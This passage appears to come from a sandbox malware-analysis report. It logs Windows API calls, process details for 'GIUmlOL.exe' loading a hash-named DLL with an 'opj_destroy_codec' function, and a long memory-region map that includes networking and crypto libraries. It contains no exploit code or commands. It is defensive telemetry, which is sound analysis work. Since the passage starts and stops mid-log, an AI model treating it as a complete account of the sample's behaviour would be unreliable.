(hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.387] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.387] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.388] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.389] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.389] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.390] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.391] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.392] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.393] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.393] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.394] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.395] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.396] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.396] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.397] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.398] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.398] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.399] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.400] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.401] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.401] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.402] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.403] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.404] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.405] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.406] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.406] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.407] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.408] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.408] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0208.936] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0208.950] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0213.686] FreeLibrary (hLibModule=0x7ffc45e90000) returned 1 [0213.691] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0213.691] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0213.692] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0213.692] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0213.692] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0213.692] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0213.693] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4670f0 | out: hHeap=0x450000) returned 1 [0213.693] RtlInterlockedFlushSList (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) returned 0x0 [0213.693] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45b7d0 | out: hHeap=0x450000) returned 1 [0213.693] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x454fa0 | out: hHeap=0x450000) returned 1 [0213.693] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x454fe0 | out: hHeap=0x450000) returned 1 [0213.693] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x460e00 | out: hHeap=0x450000) returned 1 [0213.693] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x455020 | out: hHeap=0x450000) returned 1 [0213.693] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x455060 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45b5f0 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x453fb0 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45b650 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x453eb0 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x459900 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x454090 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4525f0 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x453ef0 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4609f0 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45b410 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x460c70 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x453f70 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45ba20 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45b440 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45b470 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45ba40 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45b4a0 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45ba80 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x458d00 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x458d20 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x458d40 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x468750 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x468610 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x458d60 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45b680 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4690a0 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45b740 | out: hHeap=0x450000) returned 1 [0213.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x469200 | out: hHeap=0x450000) returned 1 [0213.695] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45aa10 | out: hHeap=0x450000) returned 1 [0213.695] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x454400 | out: hHeap=0x450000) returned 1 [0213.696] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x465ee0 | out: hHeap=0x450000) returned 1 [0213.696] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0213.696] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45aca0 | out: hHeap=0x450000) returned 1 [0213.697] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x465b10 | out: hHeap=0x450000) returned 1 [0213.697] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0213.697] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0213.698] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0213.698] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0213.698] FreeLibrary (hLibModule=0x7ffc5ecd0000) returned 1 [0213.701] LocalFree (hMem=0x459770) returned 0x0 [0213.701] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0213.701] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0213.701] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x461c20 | out: hHeap=0x450000) returned 1 [0213.701] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x464680 | out: hHeap=0x450000) returned 1 [0213.702] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x7ffc5be50000 [0213.702] GetProcAddress (hModule=0x7ffc5be50000, lpProcName="AppPolicyGetProcessTerminationMethod") returned 0x0 [0213.702] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x14fe98 | out: phModule=0x14fe98) returned 0 [0213.702] ExitProcess (uExitCode=0x0) [0213.702] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45c320 | out: hHeap=0x450000) returned 1 Thread: id = 174 os_tid = 0x3c0 Process: id = "18" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x6925b000" os_pid = "0x1280" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_codec" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3817 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3818 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3819 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3820 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 3821 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 3822 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3823 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3824 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3825 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 3826 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 3827 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3828 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3829 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3830 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3831 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 3832 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3833 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3834 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3835 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3836 start_va = 0x680000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 3837 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3838 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3839 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3840 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 3841 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3842 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3843 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3844 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3845 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3846 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3847 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3848 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3849 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3850 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3851 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3852 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3853 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3854 start_va = 0x780000 end_va = 0x907fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 3855 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3856 start_va = 0x910000 end_va = 0xa90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 3857 start_va = 0xaa0000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 3858 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 3859 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 3860 start_va = 0x4c0000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 3861 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3862 start_va = 0x1ea0000 end_va = 0x1f5ffff monitored = 0 entry_point = 0x1ec0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3864 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 3869 start_va = 0x1ea0000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 3870 start_va = 0x1fa0000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 3871 start_va = 0x21a0000 end_va = 0x259ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 3873 start_va = 0x25a0000 end_va = 0x2d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 3874 start_va = 0x2da0000 end_va = 0x3d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002da0000" filename = "" Region: id = 4148 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 4160 start_va = 0x3d70000 end_va = 0x40a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4206 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 4207 start_va = 0x40b0000 end_va = 0x4341fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 4222 start_va = 0x40b0000 end_va = 0x41f8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 4224 start_va = 0x40b0000 end_va = 0x4272fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 4696 start_va = 0x40b0000 end_va = 0x5640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 4755 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4756 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4758 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4759 start_va = 0x40b0000 end_va = 0x4274fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 4761 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4762 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4763 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4765 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4766 start_va = 0x40b0000 end_va = 0x4215fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 4767 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 4768 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 4769 start_va = 0x1b0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 4770 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4771 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4772 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4773 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4774 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4775 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4776 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4777 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4778 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4779 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4780 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4781 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4782 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4783 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4784 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4785 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4786 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4787 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 